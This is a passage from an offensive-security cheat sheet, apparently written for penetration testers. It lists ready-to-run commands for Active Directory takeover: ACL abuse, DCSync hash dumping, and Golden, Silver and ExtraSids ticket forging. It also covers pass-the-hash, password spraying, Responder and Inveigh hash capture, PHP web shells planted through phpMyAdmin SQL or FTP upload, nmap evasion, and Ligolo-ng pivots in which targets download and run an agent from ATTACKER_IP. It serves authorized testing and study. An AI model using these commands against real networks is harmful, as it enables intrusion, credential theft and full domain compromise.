
Windows — PowerView

Set-DomainObjectOwner -Identity <TARGET_OBJECT> -OwnerIdentity <USER>

Grant GenericAll rights after taking ownership

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add genericAll "<TARGET_DN>" <USER>

Windows — PowerView

Add-DomainObjectACL -TargetIdentity <TARGET_OBJECT> -PrincipalIdentity <USER> -Rights All

WriteDACL

Grant GenericAll over the target object

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add genericAll "<TARGET_DN>" <USER>

Windows — PowerView

Add-DomainObjectACL -TargetIdentity <TARGET_OBJECT> -PrincipalIdentity <USER> -Rights All

AllExtendedRights

Change target user’s password

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' set password <TARGET_USER> '<NEW_PASS>'

Windows — PowerView

Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString '<NEW_PASS>' -AsPlainText -Force)

Grant DCSync rights to the current user

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add dcsync <USER>

Windows — PowerView

Add-DomainObjectACL -TargetIdentity "<DOMAIN DN>" -PrincipalIdentity <USER> -Rights DCSync

AddSelf

Add the current user to a group

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add groupMember <GROUP> <USER>

Windows — PowerView

Add-DomainGroupMember -Identity "<GROUP>" -Members <USER>

DCSync

Dump domain hashes with secretsdump.py

Linux

secretsdump.py -outputfile <DOMAIN>_hashes -just-dc <DOMAIN>/<USER>@<DC_IP>

DCSync a specific user with Mimikatz

Windows — Mimikatz

privilege::debug
lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\administrator

Forests & Trusts

Enumerate trust relationships

Windows — PowerView

Get-DomainTrust
Get-DomainTrustMapping

Windows — AD Module

Get-ADTrust -Filter *

Windows — CMD

netdom query /domain:<DOMAIN> trust

Find foreign group memberships across a trust

Get-DomainForeignGroupMember -Domain <TRUSTED_DOMAIN>

Cross-forest Kerberoasting — request TGS tickets for SPNs in the trusted domain

Linux

GetUserSPNs.py -request -target-domain <TRUSTED_DOMAIN> <DOMAIN>/<USER>:'<PASS>'

Windows — Rubeus

.\Rubeus.exe kerberoast /domain:<TRUSTED_DOMAIN> /user:<TARGET_USER> /nowrap

ExtraSids

Dump the KRBTGT hash from the child domain DC

secretsdump.py <CHILD_DOMAIN>/<USER>:'<PASS>'@<CHILD_DC_IP> -just-dc-user <CHILD_DOMAIN>/krbtgt

Get the child domain SID

lookupsid.py <CHILD_DOMAIN>/<USER>:'<PASS>'@<CHILD_DC_IP> | grep "Domain SID"

Get the Enterprise Admins SID from the parent domain

lookupsid.py <CHILD_DOMAIN>/<USER>:'<PASS>'@<PARENT_DC_IP> | grep -B12 "Enterprise Admins"

Forge a Golden Ticket with the EA SID and access the parent domain

Linux

ticketer.py -nthash <KRBTGT_HASH> -domain <CHILD_DOMAIN> -domain-sid <CHILD_SID> -extra-sid <EA_SID> hacker
export KRB5CCNAME=hacker.ccache
psexec.py <CHILD_DOMAIN>/hacker@<PARENT_DC_FQDN> -k -no-pass -target-ip <PARENT_DC_IP>

Windows — Mimikatz

kerberos::golden /user:hacker /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /krbtgt:<KRBTGT_HASH> /sids:<EA_SID> /ptt

Golden Ticket

Obtain the KRBTGT hash via DCSync

Linux

secretsdump.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP> -just-dc-user <DOMAIN>/krbtgt

Windows — Mimikatz

lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\krbtgt

Get the domain SID

lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP> | grep "Domain SID"

Forge a Golden Ticket and use it

Linux

ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <USER>
export KRB5CCNAME=<USER>.ccache
psexec.py <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass

Windows — Mimikatz

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ptt

Silver Ticket

Obtain the target service account’s NTLM hash — via secretsdump, Kerberoast crack, or LSASS dump
Get the domain SID

lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP> | grep "Domain SID"

Forge a Silver Ticket for the target SPN and use it

Linux

ticketer.py -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>
export KRB5CCNAME=<USER>.ccache

Windows — Mimikatz

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /target:<TARGET_HOST> /service:<SERVICE> /rc4:<SERVICE_HASH> /ptt

Cookies & Sessions

Cookie security flags, session fixation testing, and CSRF vulnerability identification.

Set-Cookie: sessionid=abc123; Secure; HttpOnly; SameSite=Lax

Flag	Effect	Missing = Risk
`Secure`	Cookie only sent over HTTPS	Exposed over HTTP — interception
`HttpOnly`	JavaScript cannot read the cookie	Readable via XSS — session theft
`SameSite=Strict`	Never sent on cross-site requests	CSRF possible
`SameSite=Lax`	Sent on top-level navigations only	Partial CSRF protection
`SameSite=None`	Always sent cross-site (requires `Secure`)	CSRF if not mitigated elsewhere

Session Fixation

Occurs when the application does not issue a new session ID after login — an attacker who knows a pre-auth session ID can hijack the authenticated session.

Test:

Grab a session cookie before logging in

curl -I http://<TARGET>/login

Note the session ID in Set-Cookie
Log in while keeping that cookie value
Check the response — is the session ID still the same?

Vulnerable: same sessionid before and after login
Secure: new session ID issued on successful authentication

CSRF Testing

CSRF occurs when a server accepts state-changing requests without verifying they were intentionally made by the user.

State-changing requests to target: login, password change, email change, account settings, fund transfers.

Test:

Capture a POST request with Burp

POST /change-password
Cookie: sessionid=ABC123
csrf_token=7f8a92d1&password=newpass

Find the CSRF token in the form source

<input type="hidden" name="csrf_token" value="7f8a92d1">

Remove or modify the token and resend

Secure: request rejected with 403 or “Invalid CSRF token”
Vulnerable: request succeeds — any forged request from a logged-in user’s browser would work

Cookies may be base64-encoded or signed JWTs — inspect before assuming they’re opaque.

echo "<COOKIE_VALUE>" | base64 -d

JWT — decode payload (middle segment)

echo "<PAYLOAD_B64>" | base64 -d | python3 -m json.tool

JWT — check for alg: none bypass by stripping the signature and setting "alg":"none" in the header.

phpMyAdmin

phpMyAdmin discovery, default credential testing, SQL to web shell, and file read/write.

Discovery

Common paths

/phpmyadmin/
/pma/
/db/
/dbadmin/
/mysql/
/phpMyAdmin/
/phpmy/

gobuster dir -u http://<TARGET> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php

Default Credentials

Username	Password
`root`	(blank)
`root`	`root`
`root`	`toor`
`root`	`password`
`admin`	`admin`
`admin`	`password`
`pma`	(blank)

Version Detection

curl -s http://<TARGET>/phpmyadmin/ | grep -i phpMyAdmin | head -5

Version is shown in the page footer or meta tags.

Write a Web Shell via SQL

Requires FILE privilege and knowledge of the web root path

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Trigger

curl http://<TARGET>/shell.php?cmd=id

Read Sensitive Files via SQL

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');

Import a PHP Shell

If INTO OUTFILE is blocked, use the Import tab to run SQL that writes a file, or upload a SQL file that creates a UDF (User Defined Function) for command execution.

CVE-2018-12613 — LFI (phpMyAdmin < 4.8.2)

Unauthenticated local file inclusion via the target parameter

curl "http://<TARGET>/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"

Notes

phpMyAdmin credentials often reuse the MySQL root password
If you have DB creds from a config file (WordPress wp-config.php, Joomla configuration.php, etc.) try them here first
secure_file_priv MySQL setting may block INTO OUTFILE to arbitrary paths

Hashcat

Hashcat — GPU-accelerated password cracking. Hash modes, attack types, and common cracking workflows.

Common Hash Modes

Mode	Hash Type
`0`	MD5
`100`	SHA1
`1000`	NTLM
`1800`	SHA-512 Unix ( $6$ )
`2100`	DCC2 / MSCachev2
`5600`	NTLMv2
`13100`	Kerberoast (TGS-REP)
`16900`	Ansible Vault
`18200`	AS-REP Roast
`22921`	Kerberos 5 AS-REQ

Basic Dictionary Attack

hashcat -m <MODE> <HASH_FILE> /usr/share/wordlists/rockyou.txt

Rule-Based Attack

hashcat -m <MODE> <HASH_FILE> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

d3ad0ne ruleset (aggressive mutations)

hashcat -m <MODE> <HASH_FILE> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Combinator Attack

hashcat -m <MODE> -a 1 <HASH_FILE> wordlist1.txt wordlist2.txt

Mask Attack (brute force pattern)

hashcat -m <MODE> -a 3 <HASH_FILE> '?u?l?l?l?d?d?d?d'

Mask	Charset
`?l`	lowercase a-z
`?u`	uppercase A-Z
`?d`	digits 0-9
`?s`	special characters
`?a`	all of the above

Show Cracked Results

hashcat -m <MODE> <HASH_FILE> --show

Useful Flags

Flag	Description
`--username`	Strip username prefix from `user:hash` format
`-O`	Optimized kernel — faster but limits password length
`--force`	Ignore warnings (use in VMs)
`--status`	Show progress while running

Lateral Movement

Move between hosts using obtained credentials or hashes — PtH, PtT, WinRM, RDP, and remote execution.

Pass-the-Hash

Validate hash access with NXC

nxc smb <TARGET> -u <USER> -H <NTLM_HASH>

Spray a hash across a subnet

nxc smb <CIDR> -u <USER> -H <NTLM_HASH>

Get a SYSTEM shell via psexec with a hash

psexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM_HASH>

Get a shell via wmiexec with a hash — fewer logs than psexec

wmiexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM_HASH>

Connect with evil-winrm using a hash

evil-winrm -i <TARGET> -u <USER> -H <NTLM_HASH>

Pass-the-Ticket

Request a TGT and export to ccache

getTGT.py <DOMAIN>/<USER>:'<PASS>'
export KRB5CCNAME=<USER>.ccache

Use the ticket for remote execution

psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Request and immediately pass a TGT with Rubeus

.\Rubeus.exe asktgt /user:<USER> /password:<PASS> /ptt

Pass an existing .kirbi ticket with Rubeus

.\Rubeus.exe ptt /ticket:<BASE64_TICKET>

WinRM

Connect with credentials

evil-winrm -i <TARGET> -u <USER> -p '<PASS>'

Connect with a hash

evil-winrm -i <TARGET> -u <USER> -H <NTLM_HASH>

Connect from Windows with PSRemoting

Enter-PSSession -ComputerName <TARGET> -Credential <DOMAIN>\<USER>

RDP

Connect with credentials

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>'

Connect with hash (Restricted Admin mode must be enabled)

xfreerdp /v:<TARGET> /u:<USER> /pth:<NTLM_HASH>

SMB Execution

Shell via psexec — authenticates over SMB, runs as SYSTEM

psexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>

WMI Execution

Semi-interactive shell via wmiexec

wmiexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>

Kerberos Double Hop

Check for cached tickets — if only the current host is listed, double hop is the issue

klist

Create a PSCredential object to pass credentials explicitly

$SecPassword = ConvertTo-SecureString '<PASS>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)

Use the credential object with domain commands via the -credential flag

Get-DomainUser -spn -credential $Cred | Select-Object samaccountname

Register-PSSessionConfiguration -Name proxysess -RunAsCredential <DOMAIN>\<USER>
Enter-PSSession -ComputerName <TARGET> -Credential <DOMAIN>\<USER> -ConfigurationName proxysess

Pivoting

SSH local port forward — reach an internal service through a jump host

ssh -L <LOCAL_PORT>:127.0.0.1:<REMOTE_PORT> <USER>@<JUMP_HOST>

SSH dynamic SOCKS proxy — route all proxychains traffic through the jump host

ssh -D 1080 <USER>@<JUMP_HOST>
proxychains nmap -sT -p <PORTS> <INTERNAL_TARGET>

Impacket

Impacket script reference — secretsdump, psexec, wmiexec, GetUserSPNs, ticketer, and more.

secretsdump

Dump all domain hashes via DCSync

secretsdump.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP>

Dump only a specific user

secretsdump.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP> -just-dc-user <DOMAIN>/<TARGET_USER>

Dump from local SAM and SYSTEM hive files

secretsdump.py -sam sam -system system LOCAL

psexec

SYSTEM shell over SMB

psexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>
psexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM_HASH>

wmiexec

Semi-interactive shell via WMI — fewer logs than psexec

wmiexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>
wmiexec.py <DOMAIN>/<USER>@<TARGET> -hashes :<NTLM_HASH>

GetUserSPNs

List and request TGS tickets for Kerberoasting

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -request -outputfile kerberoast.out

Target a specific user

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -request-user <TARGET_USER> -outputfile kerberoast.out

Cross-forest request

GetUserSPNs.py -request -target-domain <TRUSTED_DOMAIN> <DOMAIN>/<USER>:'<PASS>'

getTGT

Request a TGT and save as ccache

getTGT.py <DOMAIN>/<USER>:'<PASS>'
export KRB5CCNAME=<USER>.ccache

ticketer

Forge a Golden Ticket

ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <USER>

Forge an ExtraSids Golden Ticket for forest escalation

ticketer.py -nthash <KRBTGT_HASH> -domain <CHILD_DOMAIN> -domain-sid <CHILD_SID> -extra-sid <EA_SID> hacker

Forge a Silver Ticket

ticketer.py -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>

lookupsid

Get the domain SID

lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC_IP> | grep "Domain SID"

Find the Enterprise Admins SID from a parent domain

lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<PARENT_DC_IP> | grep -B12 "Enterprise Admins"

smbclient

Interactive SMB shell

smbclient.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>

ntlmrelayx

Relay captured NTLM auth to a target

ntlmrelayx.py --no-http-server -smb2support -t <TARGET>

Relay to AD CS web enrollment (PetitPotam/ESC8)

ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController

Inveigh

Inveigh — PowerShell LLMNR/NBT-NS/mDNS poisoner for Windows hash capture.

Usage

Import the module

Import-Module .\Inveigh.ps1

Start with console output

Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -FileOutput Y

Start with file output only (quiet on screen)

Invoke-Inveigh -NBNS Y -SMB Y -ConsoleOutput N -FileOutput Y -FileOutputDirectory C:\Windows\Temp

View captured hashes

Get-Inveigh

Stop Inveigh

Stop-Inveigh

Read output files

type C:\Windows\Temp\Inveigh-*.txt

InveighZero

InveighZero — C# rewrite of Inveigh for Windows LLMNR/NBT-NS poisoning and hash capture.

Usage

Start InveighZero

.\Inveigh.exe

Enter the interactive console (press ESC)

View unique captured NTLMv2 hashes

GET NTLMV2UNIQUE

View unique captured usernames

GET NTLMV2USERNAMES

Crack Captured Hashes

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Kerbrute

Kerbrute — Kerberos-based username enumeration and password spraying without incrementing bad password counts.

User Enumeration

Enumerate valid usernames against a domain — does not increment bad password count

kerbrute userenum -d <DOMAIN> --dc <DC_IP> <WORDLIST> -o valid_users.txt

Password Spray

Spray a single password against a user list

kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> valid_users.txt '<PASSWORD>'

Brute Force a Single User

kerbrute bruteuser -d <DOMAIN> --dc <DC_IP> /usr/share/wordlists/rockyou.txt <USER>

Ligolo-ng

Ligolo-ng — transparent TUN-based tunneling for single and multi-hop pivoting.

First Pivot Setup

On attacker box — create the TUN interface and start the proxy

sudo ip tuntap add user <YOUR_USER> mode tun ligolo
sudo ip link set ligolo up
sudo ligolo-proxy -selfcert

Serve the agent

sudo python3 -m http.server 9005

On target — download and run the agent

Linux

wget http://<ATTACKER_IP>:9005/agent -O agent
chmod +x agent
./agent -connect <ATTACKER_IP>:11601 -ignore-cert

Windows — CMD

wget http://<ATTACKER_IP>:9005/agent.exe -O agent.exe
.\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert

Windows — PowerShell

Invoke-WebRequest http://<ATTACKER_IP>:9005/agent.exe -OutFile agent.exe -UseBasicParsing
.\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert

In the Ligolo proxy console — connect the tunnel

session        # choose session number
autoroute      # choose IP, select existing tunnel ligolo, confirm

Second Pivot (Double Hop)

On attacker box — create a second TUN interface

sudo ip tuntap add user <YOUR_USER> mode tun ligolo-double
sudo ip link set ligolo-double up

In session 1 on attacker — add a listener so target 1 relays agent traffic

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

On target 1 — serve the agent to target 2

sudo python3 -m http.server 9005

On target 2 — download and run agent, connecting via target 1’s tunnel IP

wget http://<TARGET1_TUNNEL_IP>:9005/agent -O agent
chmod +x agent
./agent -connect <TARGET1_TUNNEL_IP>:11601 -ignore-cert

In the Ligolo proxy console — connect second tunnel

session        # choose new session
autoroute      # choose IP, select ligolo-double, confirm

Listeners

List active listeners

listener_list

Stop a listener

listener_stop <ID>

Forward a port through the tunnel (e.g. catch a reverse shell)

listener_add --addr 0.0.0.0:<LISTEN_PORT> --to 127.0.0.1:<LOCAL_PORT> --tcp

Troubleshooting

Error: Unable to start tunnel: file exists — delete and recreate the interface

sudo ip link delete ligolo
sudo ip tuntap add user <YOUR_USER> mode tun ligolo
sudo ip link set ligolo up

Tunnel running but can’t reach new network — re-add the route manually

ip route add <INTERNAL_CIDR> dev ligolo

linkedin2username

linkedin2username — generate username lists from LinkedIn employee data for password spraying.

Usage

Generate usernames for a company (requires LinkedIn session cookie)

python3 linkedin2username.py -u <EMAIL> -p '<PASS>' -c '<COMPANY_NAME>'

Use a cookie instead of credentials

python3 linkedin2username.py -c '<COMPANY_NAME>' --cookie '<LI_AT_COOKIE>'

Specify username format (default is first.last)

python3 linkedin2username.py -c '<COMPANY_NAME>' -n 'flast'

Common -n formats: firstlast, first.last, flast, f.last, lastf

Nmap

Nmap scanning workflows — host discovery, TCP/UDP, version detection, NSE scripts, and evasion.

Host Discovery

ICMP sweep of a CIDR range

sudo nmap -sn -oA tnet <CIDR>

ARP scan (local network)

nmap -sn -PR <CIDR>

Scan from a host list

sudo nmap -sn -oA tnet -iL hosts.txt

TCP Scanning

Full port scan — all 65535 ports

sudo nmap -sS -Pn -p- --min-rate 1000 --max-rtt-timeout 1s --max-retries 5 --open -n -oN nmap_ports.txt <TARGET>

Extract open ports into a variable

ports=$(awk '/^[0-9]+\/tcp +open/{print $1}' nmap_ports.txt | cut -d/ -f1 | paste -sd, -)

Targeted scan with version detection and default scripts

sudo nmap -sS -Pn -sV -sC -p "$ports" -n -oN nmap_detailed.txt <TARGET>

Vuln scan on open ports

sudo nmap -sS -Pn -T4 --script vuln -p "$ports" -n -oN nmap_vuln.txt <TARGET>

UDP Scanning

Targeted common UDP ports

sudo nmap -sU -Pn -sV -p 53,67,68,69,123,135,137,138,139,161,389,500,514,520,623,1900,4500,5353 -T4 -n -oN nmap_udp.txt <TARGET>

NSE Scripts

Category	Script flag	Use
VNC	`vnc-info`	VNC version and info
SSH	`ssh2-enum-algos`	Supported algorithms
Kerberos	`krb5-enum-users`	Username enumeration
LDAP	`ldap*`	LDAP enumeration
Web	`http-enum,http-title,http-headers`	Web fingerprint
Vuln	`http-vuln*`	Web vulnerability checks

Run a specific script

nmap -p <PORT> --script <SCRIPT_NAME> <TARGET>

Evasion

Decoy scan — mix real traffic with fake source IPs

sudo nmap <TARGET> -p <PORT> -sS -Pn -n -D RND:5

Scan from a spoofed source IP

sudo nmap <TARGET> -n -Pn -p <PORT> -S <SPOOF_IP> -e tun0

Send from a DNS source port

sudo nmap <TARGET> -p <PORT> -sS -Pn -n --source-port 53

Key Flags

Flag	Description
`-sS`	SYN scan (stealth)
`-sT`	TCP connect scan
`-sU`	UDP scan
`-sV`	Service version detection
`-sC`	Default NSE scripts
`-sn`	Host discovery only, no port scan
`-Pn`	Skip ICMP ping, assume host is up
`-n`	No DNS resolution
`-p-`	All ports
`-p <ports>`	Specific ports
`-T<0-5>`	Timing (0=paranoid, 4=aggressive)
`-oA <name>`	Save all output formats
`-oN <file>`	Normal output
`--open`	Show open ports only
`--min-rate <n>`	Minimum packets per second

NetExec (NXC)

NetExec — multi-protocol network assessment tool for enumeration, spraying, roasting, and credential dumping.

No-Credential Enumeration

SMB host discovery — identify live hosts and signing status

nxc smb <CIDR>

Generate relay target list — hosts with signing disabled

nxc smb <CIDR> --gen-relay-list relay.txt

Enumerate password policy (null session)

nxc smb <DC_IP> -u '' -p '' --pass-pol

Enumerate users (null session)

nxc smb <DC_IP> -u '' -p '' --users

Enumerate shares (null or guest)

nxc smb <DC_IP> -u '' -p '' --shares
nxc smb <DC_IP> -u guest -p '' --shares

RID brute-force — enumerate users without creds

nxc smb <DC_IP> -u '' -p '' --rid-brute

ASREPRoast without credentials

nxc ldap <DC_FQDN> -u users.txt -p '' --asreproast asreproast.out

Password Spraying

Spray a single password against a user list (SMB)

nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success

Spray LDAP

nxc ldap <DC_FQDN> -u users.txt -p '<PASSWORD>' --continue-on-success

Spray WinRM — paired list, one attempt per user

nxc winrm <TARGET> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Spray MSSQL (domain account)

nxc mssql <TARGET> -u users.txt -p '<PASSWORD>' -d <DOMAIN>

Enumeration With Credentials

Enumerate domain users and groups

nxc smb <DC_IP> -u <USER> -p '<PASS>' --users --groups

Enumerate shares

nxc smb <TARGET> -u <USER> -p '<PASS>' --shares

Enumerate logged-on users

nxc smb <TARGET> -u <USER> -p '<PASS>' --loggedon-users

Enumerate GMSA passwords

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --gmsa

Enumerate LAPS

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M laps

Enumerate accounts with AdminCount=1

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --admin-count

Enumerate accounts trusted for delegation

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --trusted-for-delegation

Get domain SID

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --get-sid

Read ACLs with daclread

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M daclread -o TARGET=<SAMACCOUNTNAME> ACTION=read

Find accounts with DCSync rights

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' -M daclread -o TARGET_DN="DC=<DOMAIN>,DC=<TLD>" ACTION=read RIGHTS=DCSync

Roasting

Kerberoast

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --kerberoasting kerberoasting.out
hashcat -m 13100 kerberoasting.out /usr/share/wordlists/rockyou.txt

ASREPRoast

nxc ldap <DC_FQDN> -u <USER> -p '<PASS>' --asreproast asreproast.out
hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt

List all files on a share (exclude noisy shares)

nxc smb <TARGET> -u <USER> -p '<PASS>' -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL

Download all accessible files from a share

nxc smb <TARGET> -u <USER> -p '<PASS>' -M spider_plus -o EXCLUDE_DIR=ADMIN$,IPC$,print$,NETLOGON,SYSVOL READ_ONLY=false

Search a share for file pattern or keyword

nxc smb <TARGET> -u <USER> -p '<PASS>' --spider <SHARE> --pattern txt
nxc smb <TARGET> -u <USER> -p '<PASS>' --spider <SHARE> --content --regex <KEYWORD>

Download a file from a share

nxc smb <TARGET> -u <USER> -p '<PASS>' --share <SHARE> --get-file <REMOTE_FILE> <LOCAL_FILE>

Forced Hash Capture — Slinky

nxc smb <TARGET> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME>
# cleanup:
nxc smb <TARGET> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME> CLEANUP=YES

Command Execution

CMD via SMB (requires admin)

nxc smb <TARGET> -u <USER> -p '<PASS>' -x "<COMMAND>"

PowerShell via SMB

nxc smb <TARGET> -u <USER> -p '<PASS>' -X "<PS_COMMAND>"

CMD via WinRM

nxc winrm <TARGET> -u <USER> -p '<PASS>' -x "<COMMAND>"

Credential Dumping

Dump SAM (local hashes)

nxc smb <TARGET> -u <USER> -p '<PASS>' --sam

Dump NTDS (domain hashes — run against DC)

nxc smb <DC_IP> -u <USER> -p '<PASS>' --ntds

Dump LSA secrets (cached domain creds)

nxc smb <TARGET> -u <USER> -p '<PASS>' --lsa

Dump via lsassy module

nxc smb <TARGET> -u <USER> -p '<PASS>' -M lsassy

GPO Credential Modules

nxc smb <TARGET> -u <USER> -p '<PASS>' -M gpp_password
nxc smb <TARGET> -u <USER> -p '<PASS>' -M gpp_autologin

Key Flags

Flag	Description
`-u`	Username or file
`-p`	Password or file
`--local-auth`	Authenticate as local account
`--no-bruteforce`	Pair user:pass from lists (no cross-product)
`--continue-on-success`	Keep spraying after a hit
`-x`	Execute CMD command
`-X`	Execute PowerShell command
`-M <module>`	Run a module
`-o KEY=VALUE`	Module options
`-L`	List modules for a protocol

PowerView

PowerView — PowerShell AD recon module for enumerating users, groups, ACLs, trusts, and more.

Load Module

Import-Module .\PowerView.ps1

Domain / LDAP Functions

Command	Description
`Get-Domain`	Return the AD object for the current or specified domain
`Get-DomainController`	List domain controllers
`Get-DomainUser`	Return all users or a specific user
`Get-DomainComputer`	Return all computers or a specific computer
`Get-DomainGroup`	Return all groups or a specific group
`Get-DomainGroupMember -Identity '<GROUP>'`	Return members of a group
`Get-DomainOU`	Enumerate Organizational Units
`Get-DomainFileServer`	Return file servers
`Get-DomainDFSShare`	Return distributed file systems
`Find-InterestingDomainAcl`	Find ACLs with non-default modification rights

GPO Functions

Command	Description
`Get-DomainGPO`	Return all GPOs
`Get-DomainPolicy`	Return default domain or DC policy

Computer Enumeration

Command	Description
`Get-NetLocalGroup -ComputerName <HOST>`	Enumerate local groups
`Get-NetLocalGroupMember -ComputerName <HOST> -GroupName Administrators`	Enumerate local group members
`Get-NetShare -ComputerName <HOST>`	Return open shares
`Get-NetSession -ComputerName <HOST>`	Return active sessions
`Test-AdminAccess -ComputerName <HOST>`	Test local admin access

Meta / Hunt Functions

Command	Description
`Find-DomainUserLocation`	Find machines where specific users are logged in
`Find-DomainShare`	Find reachable shares on domain machines
`Find-InterestingDomainShareFile`	Search for files matching criteria on readable shares
`Find-LocalAdminAccess`	Find machines where current user has local admin

Trust Functions

Command	Description
`Get-DomainTrust`	Return domain trusts
`Get-ForestTrust`	Return forest trusts
`Get-DomainForeignUser`	Enumerate users in groups outside their domain
`Get-DomainForeignGroupMember`	Enumerate groups with foreign members
`Get-DomainTrustMapping`	Enumerate all trusts recursively

Utility

Command	Description
`ConvertTo-SID -ObjectName '<USER>'`	Convert a user or group name to SID
`Get-DomainSPNTicket -SPN '<SPN>'`	Request a Kerberos ticket for an SPN
`Export-PowerViewCSV -Path out.csv`	Append results to a CSV file

Remmina

Remmina — Linux GUI remote desktop client supporting RDP, VNC, SSH, and NX protocols.

Usage

Remmina is a graphical remote desktop client. Launch from the application menu or run:

remmina

Add a new connection profile via Connection → New and configure the protocol, host, username, and password. Saved profiles can be reused across sessions.

Supports: RDP, VNC, SSH, SFTP, NX, SPICE.

Responder

Responder — LLMNR/NBT-NS/mDNS poisoner for capturing NTLMv2 hashes on the local network.

Usage

Passive analysis mode — observe requests without responding

sudo responder -I tun0 -A

Active poisoning — capture hashes

sudo responder -I tun0

With WPAD rogue proxy

sudo responder -I tun0 -wf

Crack Captured Hashes

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Key Flags

Flag	Description
`-I <iface>`	Network interface
`-A`	Analyze mode — no poisoning
`-w`	Start WPAD rogue proxy
`-f`	Fingerprint remote host OS
`-F`	Force NTLM/Basic auth on wpad.dat
`-P`	Force NTLM/Basic auth for proxy
`--lm`	Force LM hash downgrade (XP/2003)
`-v`	Verbose output

(21) FTP

FTP enumeration, anonymous access, file download, web shell upload, and brute force.

Enumeration

Nmap service and script scan

sudo nmap -sV -p21 --script ftp-* <TARGET>

Banner grab

nc <TARGET> 21

Anonymous Access

ftp <TARGET>
# Username: anonymous  Password: anonymous

Recursive download via wget (no login)

wget -m --no-passive ftp://anonymous:anonymous@<TARGET>

Authenticated Access

ftp <TARGET>
# Username: <USER>  Password: <PASS>

Download all files interactively

ftp> prompt off
ftp> recurse on
ftp> mget *

Check Write Access

Upload a test file — writable FTP may map to a web directory

ftp> put test.txt

If writable and web-accessible, upload a shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php
ftp> put shell.php
curl http://<TARGET>/shell.php?cmd=id

Raw Protocol Access (nc)

Useful when the ftp client is unavailable or FTP is only reachable via a tunnel (e.g. localhost pivot)

nc <TARGET> <PORT>
USER anonymous
PASS anonymous

Set active mode data connection — PORT format is h1,h2,h3,h4,p1,p2 where port = (p1×256)+p2

Example: attacker 10.10.15.55 listening on port 4444 → p1 = 4444÷256 = 17, p2 = 4444 mod 256 = 92

PORT 10,10,15,55,17,92

Set up a listener on attacker to receive the file

nc -lvnp <PORT> > <OUTFILE>

Retrieve a specific file

RETR <FILENAME>

Path Traversal via RETR

